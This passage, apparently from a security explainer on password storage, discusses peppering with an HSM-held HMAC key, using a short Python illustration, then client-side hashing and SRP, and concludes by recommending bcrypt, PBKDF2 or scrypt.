Peppering makes sense if you can have a secret key which the attacker will not be able to read. Remember that we use password hashing because we consider that an attacker could grab a copy of the server database, or possibly of the whole disk of the server. A typical scenario would be a server with two disks in RAID 1. One disk fails (electronic board fries – this happens a lot). The sysadmin replaces the disk, the mirror is rebuilt, no data is lost due to the magic of RAID 1. Since the old disk is dysfunctional, the sysadmin cannot easily wipe its contents. He just discards the disk. The attacker searches through the garbage bags, retrieves the disk, replaces the board, and lo! He has a complete image of the whole server system, including database, configuration files, binaries, operating system… the full monty, as the British say. For peppering to be really applicable, you need to be in a special setup where there is something more than a PC with disks; you need an HSM. HSMs are very expensive, both in hardware and in operational procedure. But with an HSM, you can just use a secret “pepper” and process passwords with a simple HMAC (e.g. with SHA-1 or SHA-256). This will be vastly more efficient than bcrypt/PBKDF2/scrypt and their cumbersome iterations. Also, usage of an HSM will look extremely professional when doing a WebTrust audit.
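A sketch of the "pepper as MAC key" idea: the password check becomes an HMAC over the salted password under a secret key, which in a real deployment would live in the HSM rather than in the code (it is hard-coded here purely for illustration):

import hashlib
import hmac

PEPPER = b"secret-key-held-in-the-HSM"      # illustration only; in practice this never leaves the HSM


def peppered_hash(password, salt):
    return hmac.new(PEPPER, salt + password, hashlib.sha256).hexdigest()


print(peppered_hash(b"hunter2", b"unique-salt-value"))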

Client-side hashing

Since hashing is (deliberately) expensive, it could make sense, in a client-server situation, to harness the CPU of the connecting clients. After all, when 100 clients connect to a single server, the clients collectively have a lot more muscle than the server.

To perform client-side hashing, the communication protocol must be enhanced to support sending the salt back to the client. This implies an extra round-trip, when compared to the simple client-sends-password-to-server protocol. This may or may not be easy to add to your specific case.

Client-side hashing is difficult in a Web context because the client uses Javascript, which is quite anemic for CPU-intensive tasks.

In the context of SRP, password hashing necessarily occurs on the client side.

Conclusion

Use bcrypt. PBKDF2 is not bad either. If you use scrypt you will be a “slightly early adopter” with the risks that are implied by this expression; but it would be a good move for scientific progress (“crash dummy” is a very honorable profession).